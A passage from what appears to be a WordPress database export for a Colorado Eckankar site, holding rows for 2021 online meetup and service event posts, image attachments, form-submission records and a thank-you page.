Giving','','publish','closed','closed','','meetup-virtual-online-event-12-secrets-of-spiritual-livingthe-spiritual-need-for-giving','','','2021-01-30 09:52:27','2021-01-30 16:52:27','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=263643',0,'tribe_events','',0),(263644,2,'2021-01-30 09:49:18','2021-01-30 16:49:18','','3 young-people-smiling','','inherit','closed','closed','','3-young-people-smiling','','','2021-01-30 09:49:18','2021-01-30 16:49:18','',263643,'https://eckankar-colorado.org/wp-content/uploads/2021/01/3-young-people-smiling.jpg',0,'attachment','image/jpeg',0),(263648,2,'2021-01-30 10:10:19','2021-01-30 17:10:19','<p><strong><span style=\"font-size: 20pt; color: #f28a27;\">Join us for this online Spiritual Learning Series <br />\r\n</span></strong><strong><span style=\"font-size: 14pt;\">Overview and Schedule Below<br />\r\n<br />\r\n</span></strong></p>\r\n<p><strong><span style=\"font-size: 20pt; color: #f28a27;\"><span style=\"color: #666666;\">ECKANKAR is…</span> </span></strong></p>\r\n<p><span style=\"color: #666666; font-size: 14pt;\">... Love<br />\r\nPursue and experience the wonders of unconditional love on a daily basis.</span></p>\r\n<p><span style=\"color: #666666; font-size: 14pt;\"> ... Wisdom<br />\r\nLearn the secret laws of life, and unlock your inner wisdom. Live your highest divine potential. </span></p>\r\n<p><span style=\"color: #666666; font-size: 14pt;\">... Freedom<br />\r\nBeyond karma lies the freedom of heart, mind, and spirit. Move easily in the presence of God</span></p>\r\n<p><span style=\"font-size: 20pt; color: #f28a27; line-height: 0.6;\"> </span></p>\r\n<p><span style=\"font-size: 12pt;\"><strong><span style=\"font-size: 14pt;\">Overview of this Series...</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar is a university for Soul. Your life, your dreams, your inner and outer daily experiences are the campus. A place of wonder.<br />\r\n<br />\r\nWhere does this journey lead?<br />\r\n<br />\r\nSpiritual Mastership is the goal of goals. The God-knowledge lies within you—and there is help along the way.<br />\r\n<br />\r\nECK membership is a dynamic program for advanced spiritual living. Whatever your goals are in life, you can see and pursue them from a higher spiritual perspective.<br />\r\n<br />\r\nThrough this series, you can find out if and how Eckankar－and its principles and practices－align with your spiritual desires for a path to true spiritual freedom. If you find out that it does, we will show you how you can subscribe to the Advanced Spiritual Living courses and begin a journey like no other.<br />\r\n<br />\r\n----------------------------------------------------------<br />\r\n<br />\r\n<strong>Sessions……Wednesdays - First Wednesday of each month</strong><br />\r\n1.……………02/03/2021<br />\r\n2.….………..03/03/2021<br />\r\n3.….………..04/07/2021<br />\r\n4.….……..…05/05/2021<br />\r\n5.….…….....06/02/2021<br />\r\n6...............07/07/2021<br />\r\n<br />\r\n<strong>1. Spiritual Stress Relief - 02/03/2021</strong><br />\r\n<br />\r\nFollow the link, then bring your questions, comments, and experiences to discuss how to acquire and develop spiritual immunity to many of the challenges of daily living.<br />\r\n<a class=\"link\" title=\"https://www.eckankar.org/wp-content/uploads/2020/10/Spiritual-Stress-Relief.pdf\" href=\"https://www.eckankar.org/wp-content/uploads/2020/10/Spiritual-Stress-Relief.pdf\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">https://www.eckankar.org/wp-content/uploads/2020/10/Spiritual-Stress-Relief.pdf</a><br />\r\n<br />\r\n<strong>2. Dreams are Real - and a Doorway to Inner Worlds - 03/03/2021</strong><br />\r\n<br />\r\nFollow the link, then bring your questions, comments, and experiences to discuss how to open to spiritual learning while you sleep.<br />\r\n<a class=\"link\" title=\"https://www.eckankar.org/experience/dreams/\" href=\"https://www.eckankar.org/experience/dreams/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">https://www.eckankar.org/experience/dreams/</a><br />\r\n<br />\r\n<strong>3. Soul Adventures - 04/07/2021</strong><br />\r\n<br />\r\nFollow the links, then bring your questions, comments, and experiences to discuss how to expand awareness naturally and to ‘dream’ consciously while you are awake.<br />\r\n<a class=\"link\" title=\"https://www.eckankar.org/soul-adventure/\" href=\"https://www.eckankar.org/soul-adventure/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">https://www.eckankar.org/soul-adventure/</a><br />\r\n<a class=\"link\" title=\"https://www.eckankar.org/experience/soul-travel/\" href=\"https://www.eckankar.org/experience/soul-travel/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">https://www.eckankar.org/experience/soul-travel/</a><br />\r\n<br />\r\n<strong>4. Past Lives/ Reincarnation - 05/05/2021</strong><br />\r\n<br />\r\nFollow the link, then bring your questions, comments, and experiences to discuss how to ‘graduate’ from this university (physical life) and end the cycle of necessary reincarnation.<br />\r\n<a class=\"link\" title=\"https://www.eckankar.org/experience/past-lives/\" href=\"https://www.eckankar.org/experience/past-lives/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">https://www.eckankar.org/experience/past-lives/</a><br />\r\n<br />\r\n<strong>5. Light and Sound - 06/02/2021</strong><br />\r\n<br />\r\nFollow the link, then bring your questions, comments, and experiences to discuss how to recognize and then strengthen your connection with audible and visible expressions of the Life Force (the ECK).<br />\r\nExperience Divine Love through the Light and Sound of God<br />\r\n<a class=\"link\" title=\"https://www.eckankar.org/experience/light-and-sound/\" href=\"https://www.eckankar.org/experience/light-and-sound/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">https://www.eckankar.org/experience/light-and-sound/</a><br />\r\n<br />\r\n<strong>6. Advanced Spiritual Living - 07/07/2021</strong><br />\r\n<br />\r\nFollow the link, then bring your questions and comments about the annually renewable subscription-based Advanced Spiritual Living courses that accompany ECKANKAR membership. The inner side of this program is customized for each individual because we are all unique spiritual beings. You will know, in your own experience if this is the right path to take you to spiritual freedom, Self-Realization, and beyond.<br />\r\n<br />\r\nAdvanced Spiritual Living Courses | Start Your ECK Adventure<br />\r\n<a class=\"link\" title=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">https://www.eckankar.org/engage/advanced-spiritual-living/</a></span></p>\r\n<p>&nbsp;</p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/275451327/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','MEETUP VIRTUAL ONLINE EVENT<br>A Journey Like No Other - <br> <i> 6 session (Zoom) Spiritual Learning Series</i>','','publish','closed','closed','','meetup-virtual-online-eventa-journey-like-no-other-6-session-zoom-spiritual-learning-series-overview','','','2021-01-30 10:23:39','2021-01-30 17:23:39','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=263648',0,'tribe_events','',0),(263649,2,'2021-01-30 10:08:55','2021-01-30 17:08:55','','seeker-in-the-light-1','','inherit','closed','closed','','seeker-in-the-light-1','','','2021-01-30 10:08:55','2021-01-30 17:08:55','',263648,'https://eckankar-colorado.org/wp-content/uploads/2021/01/seeker-in-the-light-1.jpg',0,'attachment','image/jpeg',0),(263707,2,'2021-02-01 20:19:25','2021-02-02 03:19:25','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Spiritual Nature of Problems\"</span></p>\r\n<p><span style=\"font-size: 12pt;\">You are warmly invited to our next online ECK Light and Sound Service. Join people from all walks of life at this virtual event to explore how Divine Love works in your daily life. Enjoy engaging talks, creative arts, and a video clip of Sri Harold Klemp.  </span></p>\r\n<p><span style=\"font-size: 12pt;\"><strong>To watch the ECK Light and Sound Service, on February 14th, please click the link below:</strong></span><br />\r\n<span style=\"font-size: 12pt;\"><a href=\"https://vimeo.com/499005384\"><strong>Go To Video</strong></a></span><br />\r\n<span style=\"font-size: 12pt;\"><strong>Password:</strong> Eckankar</span></p>\r\n<p class=\"color3-color\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><span style=\"font-size: 12pt;\"><span style=\"color: #f28a27;\"><strong>Please Note: The video broadcast of this event will only be available on Sunday 2/14/2021 from 10:30 a.m. until 12:00 p.m.</strong></span><em> If you attempt to access the video early and the password does not work, please try again closer to the scheduled start time.</em></span></p>\r\n<p class=\"color3-color\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><span style=\"font-size: 12pt;\">All ECK members and all members of the public are welcome.</span></p>','Light and Sound Service- Zoom Online - TEMPLATE ONLY!','','publish','closed','closed','','virtual-eck-event-eck-light-and-sound-service-template-only','','','2021-04-11 13:56:12','2021-04-11 19:56:12','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=263707',0,'tribe_events','',0),(263708,2,'2021-02-01 20:08:22','2021-02-02 03:08:22','','Online Event','','publish','closed','closed','','online-event','','','2021-02-01 20:08:22','2021-02-02 03:08:22','',0,'https://eckankar-colorado.org/?post_type=tribe_venue&#038;p=263708',0,'tribe_venue','',0),(263710,2,'2021-02-01 20:20:58','2021-02-02 03:20:58','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Spiritual Nature of Problems\"</span></p>\r\n<ul>\r\n	<li><strong><span style=\"font-size: 13pt;\">Are you looking for ways to cope spiritually with the personal and global crises we are facing?</span></strong></li>\r\n	<li><strong><span style=\"font-size: 13pt;\">Do you wonder why is this happening and how can I fix it for myself and my family?</span></strong></li>\r\n	<li><strong><span style=\"font-size: 13pt;\">Can you see a crisis as an opportunity in disguise?</span></strong></li>\r\n</ul>\r\n<p><span style=\"font-size: 12pt;\">If you answered yes to any of these questions, this ECK Light &amp; Sound Service will open new ways to find your own solutions to the challenges you are facing in your life.</span></p>\r\n<p><span style=\"font-size: 12pt;\">Harold Klemp in his book \"<em>ECK Wisdom on Solving Problems</em>\" says:</span></p>\r\n<p style=\"padding-left: 40px;\"><em><span style=\"font-size: 12pt;\"> “A solution is hidden in the folds of every reverse. No matter what is thrown into our face, there is a way to roll with the punch. People with a high state of consciousness are not frozen into inaction by terror brought about through disasters. They immediately make a plan to turn the negative energy to advantage. At this level of creative imagination, Soul is in a condition of survival. The lesson of the worlds of matter is to develop Soul’s ability to ride the crests of life.”</span></em></p>\r\n<p><span style=\"font-size: 12pt;\">You are warmly invited to our next online ECK Light and Sound Service. Join people from all walks of life at this virtual event to explore how Divine Love works in your daily life. Enjoy engaging talks, creative arts, and a video clip of Sri Harold Klemp.  </span></p>\r\n<p><span style=\"font-size: 14pt;\"><strong>To watch the ECK Light and Sound Service, on February 14th, please click the link below and enter the password:<br />\r\n</strong></span></p>\r\n<p><a class=\"meetupreg\" href=\"https://vimeo.com/499005384\" target=\"_blank\" rel=\"noopener noreferrer\">Go To Video</a> <span style=\"font-size: 16pt;\"><br />\r\n<strong>Password:</strong> Eckankar</span></p>\r\n<p class=\"color3-color\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><span style=\"font-size: 12pt;\"><span style=\"color: #f28a27;\"><strong>Please Note: The video broadcast of this event will only be available on Sunday 2/14/2021 from 10:30 a.m. until 12:00 p.m.</strong></span><em> If you attempt to access the video early and the password does not work, please try again closer to the scheduled start time.</em></span></p>\r\n<p class=\"color3-color\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><span style=\"font-size: 12pt;\">All ECK members and all members of the public are welcome.</span></p>','VIRTUAL EVENT - ECK Light and Sound Service <br>The Spiritual Nature of Problems','','publish','closed','closed','','virtual-eck-event-eck-light-and-sound-service-template-only-2','','','2021-03-09 15:02:30','2021-03-09 22:02:30','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=263710',0,'tribe_events','',0),(263762,2,'2021-02-03 20:45:12','2021-02-04 03:45:12','','barn-mountains-3','','inherit','closed','closed','','barn-mountains-3','','','2021-02-03 20:45:12','2021-02-04 03:45:12','',0,'https://eckankar-colorado.org/wp-content/uploads/2021/02/barn-mountains-3.jpg',0,'attachment','image/jpeg',0),(263772,0,'2021-02-04 11:03:12','2021-02-04 18:03:12','','','','publish','closed','closed','','263772','','','2021-02-04 11:03:12','2021-02-04 18:03:12','',0,'https://eckankar-colorado.org/nf_sub/263772/',0,'nf_sub','',0),(263785,0,'2021-02-06 17:21:44','2021-02-07 00:21:44','','','','publish','closed','closed','','263785','','','2021-02-06 17:21:44','2021-02-07 00:21:44','',0,'https://eckankar-colorado.org/nf_sub/263785/',0,'nf_sub','',0),(263791,2,'2021-02-17 09:36:24','2021-02-17 16:36:24','<p><span style=\"font-size: 20pt; color: #f28a27; line-height: 28px;\">Please join us as we continue the<br />\r\nECK Soul Adventures Series Meetups!<br />\r\n</span></p>\r\n<p><span style=\"font-size: 12pt; line-height: 14px;\"> Sponsored by Eckankar - The Path of Spiritual Freedom – in Colorado.</span></p>\r\n<p>&nbsp;</p>\r\n<p><span style=\"font-size: 14pt;\"><strong>Spiritual experiences touch us at the very core of our being – Soul, the eternal, unique, divine spark of God who we really are.</strong></span><br />\r\n<span style=\"font-size: 12pt;\">This series will help you to set out on your own Soul Adventures, by learning to recognize your spiritual experiences, benefit from them in your daily life, and awaken to more of the love, wisdom, and creative powers that are already within your heart.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\"><strong>The next two sessions will take place via Zoom on the following two Fridays from 7:00-8:15 pm:</strong></span></p>\r\n<ul>\r\n	<li style=\"list-style-type: none;\">\r\n<ul>\r\n	<li><span style=\"font-size: 12pt;\"><strong>The Power of Gratitude - Friday, 2/26/21</strong></span></li>\r\n	<li><span style=\"font-size: 12pt;\"><strong>Connect with the Sacred Light and Sound – Friday, 3/26/21</strong></span></li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<p><br />\r\n<span style=\"font-size: 13pt;\"><strong><br />\r\nThe Power of Gratitude - Friday, 2/26/21:</strong></span><br />\r\n<span style=\"font-size: 12pt;\"><em>“Gratitude begins to create a series of events for our spiritual benefit.”</em></span><br />\r\n<span style=\"font-size: 10pt;\">— Harold Klemp</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">It can awaken you to the secret of love, unseal fountains of creativity, open your heart in difficult times, and so much more!</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">Join us for a spiritual discussion on gratitude, based on this free, short e-booklet, “<a href=\"https://www.eckankar.org/wp-content/uploads/2020/11/The_Power_of_Gratitude.pdf\" target=\"_blank\" rel=\"noopener\">The Power of Gratitude</a>”, which offers inspiration, stories, tips, and spiritual exercises for exploring a unique perspective on the power of gratitude. </span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">We welcome you to explore this booklet before the Meetup, and look forward to exchanging insights and experiences related to practicing gratitude in our lives!</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">The Zoom meeting links for each Meetup will be provided to those who RSVP that they are attending.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">For more information about Eckankar, The Path of Spiritual Freedom, visit: <a class=\"link\" title=\"https://www.eckankar.org\" href=\"https://www.eckankar.org\" target=\"_blank\" rel=\"nofollow noopener ugc\">https://www.eckankar.org</a>.</span></p>\r\n<p>&nbsp;</p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/276375502/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','MEEUP ONLINE EVENT - ECK Soul Adventures:<br>The Power of Gratitude','','publish','closed','closed','','eck-soul-adventures-the-power-of-gratitude','','','2021-02-17 10:15:12','2021-02-17 17:15:12','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=263791',0,'tribe_events','',0),(263792,2,'2021-02-17 09:35:07','2021-02-17 16:35:07','','white-horse-1','','inherit','closed','closed','','white-horse-1','','','2021-02-17 09:35:07','2021-02-17 16:35:07','',263791,'https://eckankar-colorado.org/wp-content/uploads/2021/02/white-horse-1.jpg',0,'attachment','image/jpeg',0),(263805,2,'2021-02-17 10:00:16','2021-02-17 17:00:16','<p><span style=\"font-size: 20pt; color: #f28a27; line-height: 28px;\">Please join us as we continue the<br />\r\nECK Soul Adventures Series Meetups!<br />\r\n</span></p>\r\n<p><span style=\"font-size: 12pt; line-height: 14px;\"> Sponsored by Eckankar - The Path of Spiritual Freedom – in Colorado.</span></p>\r\n<p><span style=\"font-size: 13pt;\"><strong><br />\r\nSpiritual experiences touch us at the very core of our being – Soul, the eternal, unique, divine spark of God who we really are.<br />\r\n</strong> This series will help you to set out on your own Soul Adventures, by learning to recognize your spiritual experiences, benefit from them in your daily life, and awaken to more of the love, wisdom, and creative powers that are already within your heart.</span><br />\r\n<br />\r\n<span style=\"font-size: 13pt;\"><strong><br />\r\nConnect with Sacred Light and Sound – Friday, 3/26/21:</strong></span><br />\r\n<span style=\"font-size: 12pt;\">Join us for a spiritual discussion on the Sacred Light and Sound and how to discover this divine language, which can be seen, heard, and felt through dreams, intuition, gratitude, and the love we have for our families and others.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">The discussion will be based on the following webpage on the <a href=\"https://www.eckankar.org/experience/light-and-sound/\">Sacred Light and Sound</a>, which gives insights, stories, and spiritual exercises for connecting with this divine language.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">We welcome you to explore this page before the Meetup, and look forward to exchanging insights and experiences with the Light and Sound in our lives and how we can become more consciously aware of them!</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">The Zoom meeting link will be provided to those who RSVP that they are attending.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">For more information about Eckankar, The Path of Spiritual Freedom, visit: <a class=\"link\" title=\"https://www.eckankar.org\" href=\"https://www.eckankar.org\" target=\"_blank\" rel=\"nofollow noopener ugc\">https://www.eckankar.org</a>.</span></p>\r\n<p>&nbsp;</p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/276375536/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','MEETUP ONLINE EVENT - ECK Soul Adventures:<br> Connect with Sacred Light and Sound','','publish','closed','closed','','test-meeup-online-event-eck-soul-adventures-the-power-of-gratitude','','','2021-02-17 11:34:26','2021-02-17 18:34:26','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=263805',0,'tribe_events','',0),(263833,0,'2021-02-21 12:42:42','2021-02-21 19:42:42','','','','publish','closed','closed','','263833','','','2021-02-21 12:42:42','2021-02-21 19:42:42','',0,'https://eckankar-colorado.org/nf_sub/263833/',0,'nf_sub','',0),(263834,2,'2021-02-21 13:23:11','2021-02-21 20:23:11','','','','publish','closed','closed','','263834','','','2021-02-21 13:23:11','2021-02-21 20:23:11','',0,'https://eckankar-colorado.org/nf_sub/263834/',0,'nf_sub','',0),(263835,2,'2021-02-21 13:25:45','2021-02-21 20:25:45','','','','publish','closed','closed','','263835','','','2021-02-21 13:25:45','2021-02-21 20:25:45','',0,'https://eckankar-colorado.org/nf_sub/263835/',0,'nf_sub','',0),(263837,2,'2021-02-21 13:30:55','2021-02-21 20:30:55','','','','publish','closed','closed','','263837','','','2021-02-21 13:30:55','2021-02-21 20:30:55','',0,'https://eckankar-colorado.org/nf_sub/263837/',0,'nf_sub','',0),(263838,2,'2021-02-21 13:35:21','2021-02-21 20:35:21','','','','publish','closed','closed','','263838','','','2021-02-21 13:35:21','2021-02-21 20:35:21','',0,'https://eckankar-colorado.org/nf_sub/263838/',0,'nf_sub','',0),(263839,2,'2021-02-21 13:40:00','2021-02-21 20:40:00','','','','publish','closed','closed','','263839','','','2021-02-21 13:40:00','2021-02-21 20:40:00','',0,'https://eckankar-colorado.org/nf_sub/263839/',0,'nf_sub','',0),(263840,2,'2021-02-21 13:42:58','2021-02-21 20:42:58','','','','publish','closed','closed','','263840','','','2021-02-21 13:42:58','2021-02-21 20:42:58','',0,'https://eckankar-colorado.org/nf_sub/263840/',0,'nf_sub','',0),(263841,2,'2021-02-21 13:45:46','2021-02-21 20:45:46','','','','publish','closed','closed','','263841','','','2021-02-21 13:45:46','2021-02-21 20:45:46','',0,'https://eckankar-colorado.org/nf_sub/263841/',0,'nf_sub','',0),(263855,2,'2021-02-21 14:00:26','2021-02-21 21:00:26','','ninja-forms-success-bk-1','','inherit','closed','closed','','ninja-forms-success-bk-1','','','2021-02-21 14:00:26','2021-02-21 21:00:26','',0,'https://eckankar-colorado.org/wp-content/uploads/2021/02/ninja-forms-success-bk-1.jpg',0,'attachment','image/jpeg',0),(263858,2,'2021-02-21 14:04:27','2021-02-21 21:04:27','','','','publish','closed','closed','','263858','','','2021-02-21 14:04:27','2021-02-21 21:04:27','',0,'https://eckankar-colorado.org/nf_sub/263858/',0,'nf_sub','',0),(263859,2,'2021-02-21 14:10:08','2021-02-21 21:10:08','','','','publish','closed','closed','','263859','','','2021-02-21 14:10:08','2021-02-21 21:10:08','',0,'https://eckankar-colorado.org/nf_sub/263859/',0,'nf_sub','',0),(263860,2,'2021-02-21 14:12:32','2021-02-21 21:12:32','','','','publish','closed','closed','','263860','','','2021-02-21 14:12:32','2021-02-21 21:12:32','',0,'https://eckankar-colorado.org/nf_sub/263860/',0,'nf_sub','',0),(263863,2,'2021-02-21 14:44:11','2021-02-21 21:44:11','','','','publish','closed','closed','','263863','','','2021-02-21 14:44:11','2021-02-21 21:44:11','',0,'https://eckankar-colorado.org/nf_sub/263863/',0,'nf_sub','',0),(263867,2,'2021-02-21 15:51:20','2021-02-21 22:51:20','','','','publish','closed','closed','','263867','','','2021-02-21 15:51:20','2021-02-21 22:51:20','',0,'https://eckankar-colorado.org/nf_sub/263867/',0,'nf_sub','',0),(263868,2,'2021-02-21 15:56:14','2021-02-21 22:56:14','','','','publish','closed','closed','','263868','','','2021-02-21 15:56:14','2021-02-21 22:56:14','',0,'https://eckankar-colorado.org/nf_sub/263868/',0,'nf_sub','',0),(263871,2,'2021-02-21 20:18:50','2021-02-22 03:18:50','','','','publish','closed','closed','','263871','','','2021-02-21 20:18:50','2021-02-22 03:18:50','',0,'https://eckankar-colorado.org/nf_sub/263871/',0,'nf_sub','',0),(263875,2,'2021-02-21 20:37:36','2021-02-22 03:37:36','','','','publish','closed','closed','','263875','','','2021-02-21 20:37:36','2021-02-22 03:37:36','',0,'https://eckankar-colorado.org/nf_sub/263875/',0,'nf_sub','',0),(263878,2,'2021-02-21 20:47:57','2021-02-22 03:47:57','','','','publish','closed','closed','','263878','','','2021-02-21 20:47:57','2021-02-22 03:47:57','',0,'https://eckankar-colorado.org/nf_sub/263878/',0,'nf_sub','',0),(263882,0,'2021-02-21 20:56:55','2021-02-22 03:56:55','','','','publish','closed','closed','','263882','','','2021-02-21 20:56:55','2021-02-22 03:56:55','',0,'https://eckankar-colorado.org/nf_sub/263882/',0,'nf_sub','',0),(263883,2,'2021-02-22 10:41:07','2021-02-22 17:41:07','<div class=\"tmpl-call_to_action-17 boldgrid-section dynamic-gridblock background-parallax\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2021/02/ninja-forms-success-bk-1.jpg\" style=\"background-image: linear-gradient(to left, rgba(255, 255, 255, 0.5), rgba(255, 255, 255, 0.5)), url(\'https://eckankar-colorado.org/wp-content/uploads/2021/02/ninja-forms-success-bk-1.jpg\'); background-size: cover; background-position: 50% 50%;\" data-bg-overlaycolor=\"rgba(255,255,255,0.5)\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-top: 121px; padding-bottom: 118px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<div class=\"\">\r\n<p class=\"\" style=\"text-align: center; font-size: 59px; color: #a2540a;\">Thank You!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 26px;\">We appreciate you taking the time to communicate with us.<br>\r\nYou will be contacted soon regarding your submission.</p>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"row wow bounceInDown\" data-wow-duration=\"2s\" data-wow-delay=\"0s\" style=\"padding-top: 58px; padding-bottom: 0px;\">\r\n<div class=\"col-md-1 col-sm-1 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>','Thank You -- For Form Submission','','publish','closed','closed','','thank-you-for-form-submission','','','2021-02-22 10:52:48','2021-02-22 17:52:48','',0,'https://eckankar-colorado.org/?page_id=263883',0,'page','',0),(263885,2,'2021-02-22 10:41:07','2021-02-22 17:41:07',' ','','','publish','closed','closed','','263885','','','2021-02-22 10:41:07','2021-02-22 17:41:07','',0,'https://eckankar-colorado.org/263885/',31,'nav_menu_item','',0),(263887,2,'2021-02-22 10:50:28','2021-02-22 17:50:28','','','','publish','closed','closed','','263887','','','2021-02-22 10:50:28','2021-02-22 17:50:28','',0,'https://eckankar-colorado.org/nf_sub/263887/',0,'nf_sub','',0),(263890,2,'2021-02-23 15:08:52','2021-02-23 22:08:52','','email-header-logo','','inherit','closed','closed','','email-header-logo','','','2021-02-23 15:08:52','2021-02-23 22:08:52','',0,'https://eckankar-colorado.org/wp-content/uploads/2021/02/email-header-logo.png',0,'attachment','image/png',0),(263891,2,'2021-02-24 20:25:52','2021-02-25 03:25:52','<p><span style=\"font-size: 18pt; color: #f28a27;\">Can you see the obstacles in your path as stepping stones to a better life?</span></p>\r\n<p><span style=\"font-size: 18pt; color: #f28a27; line-height: 0.6;\">What is this Sound and how can it help you?</span></p>\r\n<p><span style=\"font-size: 14pt;\"><strong>Are you facing challenges in your life that you would like to see from a spiritual perspective?</strong></span><br />\r\n<span style=\"font-size: 14pt;\"><strong>How would your life be different if you could look back on each day and say \"bless this day\" with gratitude in your heart?</strong></span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">During this Meetup, we will be practicing exercises to help recognize the blessings in our life. Along with these techniques, the evening will include contemplation and discussion you discover the lessons hidden in each challenge you face so that you can have a better life. Our goal for this Meetup is that each person will be better able to recognize the blessings in their life and see that challenges are actually stepping stones to higher consciousness.<br />\r\n</span></p>\r\n<p style=\"padding-left: 40px;\">\"<span style=\"color: #666666; font-size: 12pt;\">God’s blessings are always with you. You just need the eyes to see and the ears to hear. We’re speaking of the Light and Sound of God – the visual and auditory – to see and hear God’s blessings. Because if you can open your heart with love, you can tune in to God’s will. And as you do, you will find life begins to take on meaning, beyond anything you’ve ever heard or felt before. In other words you’re going to tune in to the truth, divine truth. You will become a sincere truth seeker of the highest order.</span>”<br />\r\n<em>The Slow Burning Love of God</em>, by Harold Klemp</p>\r\n<p><span style=\"font-size: 12pt;\">This Meetup group, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.<br />\r\n<br />\r\nTo explore a deeper inner connection, check out <a class=\"link\" title=\"www.TheSoundofSoul.org\" href=\"http://www.TheSoundofSoul.org\" target=\"_blank\" rel=\"nofollow noopener ugc\">The Sound of Soul</a><br />\r\n<br />\r\nThe Zoom link will be provided to those members who RSVP that they are attending.<br />\r\n<br />\r\nThere is never a charge for this Meetup.</span></p>\r\n<p>&nbsp;</p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/276565080/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','MEETUP ONLINE EVENT - 12 Secrets of Spiritual Living<br>The Power of Blessing','','publish','closed','closed','','meetup-online-event-12-secrets-of-spiritual-livingthe-power-of-blessing','','','2021-02-24 20:56:21','2021-02-25 03:56:21','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=263891',0,'tribe_events','',0),(263892,2,'2021-02-24 20:25:15','2021-02-25 03:25:15','','mountain-stone-stream','','inherit','closed','closed','','mountain-stone-stream','','','2021-02-24 20:25:15','2021-02-25 03:25:15','',263891,'https://eckankar-colorado.org/wp-content/uploads/2021/02/mountain-stone-stream.jpg',0,'attachment','image/jpeg',0),(263901,2,'2021-02-24 20:43:20','2021-02-25 03:43:20','<p><span style=\"font-size: 18pt; color: #f28a27;\">Would you like to experience the power of gratitude in your life?</span></p>\r\n<p><span style=\"font-size: 18pt; color: #f28a27; line-height: 0.6;\">Do you want to open your heart more fully to God\'s love?</span></p>\r\n<p><span style=\"font-size: 18pt; color: #f28a27; line-height: 0.6;\">Can you appreciate the ups and downs in your life with a grateful heart?</span></p>\r\n<p><span style=\"font-size: 12pt;\">During this Meetup, we will explore these questions and more. We will be practicing exercises, contemplation, and discussing ways to experience gratitude for our own lives and all of the circumstances in them. Our goal is that everyone who attends will experience the power of gratitude to transform their life and expand their awareness.</span></p>\r\n<p style=\"padding-left: 40px;\"><span style=\"font-size: 12pt;\"><span style=\"color: #666666;\">“If you can just stop and be grateful for the blessings that are before you, your heart will open to love. Then the blessings will keep coming.”</span><br />\r\n<span style=\"font-size: 11pt;\">The Awakening Soul, p,47, Harold Klemp</span></span></p>\r\n<p><span style=\"font-size: 12pt;\">This Meetup group, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p><span style=\"font-size: 12pt;\">To explore a deeper inner connection, check out <a class=\"link\" title=\"www.TheSoundofSoul.org\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"noopener\">The Sound of Soul</a>.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">The Zoom link will be provided to those members who RSVP that they are attending.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">There is never a charge for this Meetup.</span></p>\r\n<p>&nbsp;</p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/276569290/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','MEETUP ONLINE EVENT - 12 Secrets of Spiritual Living: <br>The Power of Gratitude','','publish','closed','closed','','meetup-online-event-12-secrets-of-spiritual-living-the-power-of-gratitude','','','2021-02-24 20:47:07','2021-02-25 03:47:07','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=263901',0,'tribe_events','',0),(263902,2,'2021-02-24 20:42:49','2021-02-25 